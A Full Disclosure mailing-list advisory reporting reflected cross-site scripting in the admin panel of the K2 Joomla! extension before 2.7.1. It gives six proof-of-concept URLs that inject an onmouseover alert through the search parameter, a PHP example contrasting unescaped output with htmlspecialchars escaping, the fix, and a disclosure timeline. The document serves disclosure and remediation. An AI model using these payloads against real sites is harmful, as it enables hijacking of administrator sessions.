Message-ID: <78ea48bd-2bf4-3f34-19c6-48c68cde4362@a2secure.com>
Date: Thu, 4 Aug 2016 12:05:49 +0200
From: Manuel Mancera <mmancera@...ecure.com>
To: fulldisclosure@...lists.org
Subject: [FD] K2 (Joomla! Extension) < 2.7.1 - Reflected Cross Site Scripting
================================================================
K2 Joomla! Extension < 2.7.1 - Reflected Cross Site Scripting
================================================================
Information
--------------------
Name: K2 Joomla! Extension - Reflected Cross Site Scripting
Affected Software : K2
Affected Versions: < 2.7.1
Vendor Homepage : https://getk2.org/
http://extensions.joomla.org/extension/k2
Vulnerability Type : Reflected Cross Site Scripting
Severity : Medium
CVE: n/a
Product
--------------------
K2 is a content construction extension for Joomla!, so it allows editing the
content of the Joomla administration panel and the website.
Description
--------------------
The administrator panel of K2 suffers from multiple reflected cross-site
scripting vulnerabilities. An attacker could trick an administrator into
clicking a malicious URL and steal their session cookie, or redirect them to a
malicious site to set up further attacks (e.g. launching exploits against
their browser). This XSS only affects administrators, so the range of attacks
is limited, but it is still a risk.
Source code fixed:
https://github.com/getk2/k2/commit/c78f929dd3fcd4c55ba614ef8e789b944c30dc8d
Proof of Concept
-------------------
PoC:
http://localhost/administrator/index.php?option=com_k2&view=comments&search=" onmouseover="alert(document.domain)"/>
PoC:
http://localhost/administrator/index.php?option=com_k2&view=categories&search=" onmouseover="alert(document.domain)"/>
PoC:
http://localhost/administrator/index.php?option=com_k2&view=users&search=" onmouseover="alert(document.domain)"/>
PoC:
http://localhost/administrator/index.php?option=com_k2&view=extrafields&search=" onmouseover="alert(document.domain)"/>
PoC:
http://localhost/administrator/index.php?option=com_k2&view=items&search=" onmouseover="alert(document.domain)"/>
PoC:
http://localhost/administrator/index.php?option=com_k2&view=tags&search=" onmouseover="alert(document.domain)"/>
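The root cause behind all six PoC URLs is the same: the `search` request parameter is written back into the search box's `value` attribute without HTML-attribute escaping, so a double quote in the input closes the attribute and anything after it becomes real markup. The following is an added illustration written for this advisory, not K2's code and not the contents of the linked fix commit; the function names and the minimal input element are assumptions, and the payload is the advisory's own PoC value after URL decoding. It contrasts the vulnerable rendering with the conventional Joomla/PHP hardening (htmlspecialchars with ENT_QUOTES, which is what a Joomla view's `$this->escape()` wraps) and checks that the injected handler only survives in the unescaped output.

```php
<?php
// Added example for this advisory, not K2's code. Names are assumptions.

// Vulnerable pattern: the request value is interpolated into an HTML
// attribute unescaped, so a leading " closes value="..." and the rest of
// the input becomes attributes of the <input> element.
function renderSearchBoxVulnerable(string $search): string
{
    return '<input type="text" name="search" value="' . $search . '" />';
}

// Hardened pattern: escape for the HTML attribute context. ENT_QUOTES makes
// htmlspecialchars() encode both " and ', so the input can never terminate
// the attribute; < and > are encoded as well. In a Joomla view this is what
// $this->escape($search) does.
function renderSearchBoxSafe(string $search): string
{
    return '<input type="text" name="search" value="'
        . htmlspecialchars($search, ENT_QUOTES, 'UTF-8') . '" />';
}

// Constructed input: the advisory's PoC payload after URL decoding.
$payload = '" onmouseover="alert(document.domain)"/>';

$vulnerable = renderSearchBoxVulnerable($payload);
$safe       = renderSearchBoxSafe($payload);

// Self-check: the event-handler attribute must appear as live markup only in
// the vulnerable output. In the hardened output the quote is encoded as
// &quot;, so the whole payload remains inert text inside the value.
$handler = 'onmouseover="alert';
if (strpos($vulnerable, $handler) === false) {
    throw new RuntimeException('vulnerable rendering did not reflect the handler');
}
if (strpos($safe, $handler) !== false) {
    throw new RuntimeException('hardened rendering still contains a live handler');
}
if (strpos($safe, '&quot; onmouseover=&quot;') === false) {
    throw new RuntimeException('hardened rendering did not encode the quotes');
}

echo "vulnerable: ", $vulnerable, PHP_EOL;
echo "hardened:   ", $safe, PHP_EOL;
```

Run it with `php example.php`; the script throws if either rendering behaves unexpectedly. The same check generalizes to every K2 view listed above, because each one reflects the same `search` parameter into the same kind of attribute: escaping at the point of output, in the attribute context, is the fix, whereas filtering `onmouseover` or `alert` out of the input would leave every other attribute name and handler available.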
Solution
--------------------
Update to the latest release (2.7.1).
More info:
https://getk2.org/blog/2571-k2-v271-released
https://vel.joomla.org/resolved/1858-k2-2-7-0-xss-cross-site-scripting
Advisory Timeline
--------------------
26/07/2016 - Informed the vendor about the issue.
26/07/2016 - Vendor answered me and tried to persuade me that the XSS is not a
vulnerability. He said: "Just because you can run a piece of JS somewhere
doesn't mean it's a security issue." WTF
28/07/2016 - Informed Joomla VEL about the issue.
29/07/2016 - Joomla VEL confirmed and wrote to me that the vendor will fix it.
29/07/2016 - Vendor confirmed the vulnerability to me. LOL
04/08/2016 - Vendor fixed it in the latest release.
04/08/2016 - Public disclosure.
Definitely, sometimes full disclosure is better than responsible disclosure.
Credits & Authors
--------------------
Manuel Mancera (@sinkmanu)
Disclaimer
-------------------
All information is provided without warranty. The intent is to provide
information to secure infrastructure and/or systems, not to enable attacking
or damaging them. Therefore A2Secure shall not be liable for any direct or
indirect damages that might be caused by using this information.
_______________________________________________
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/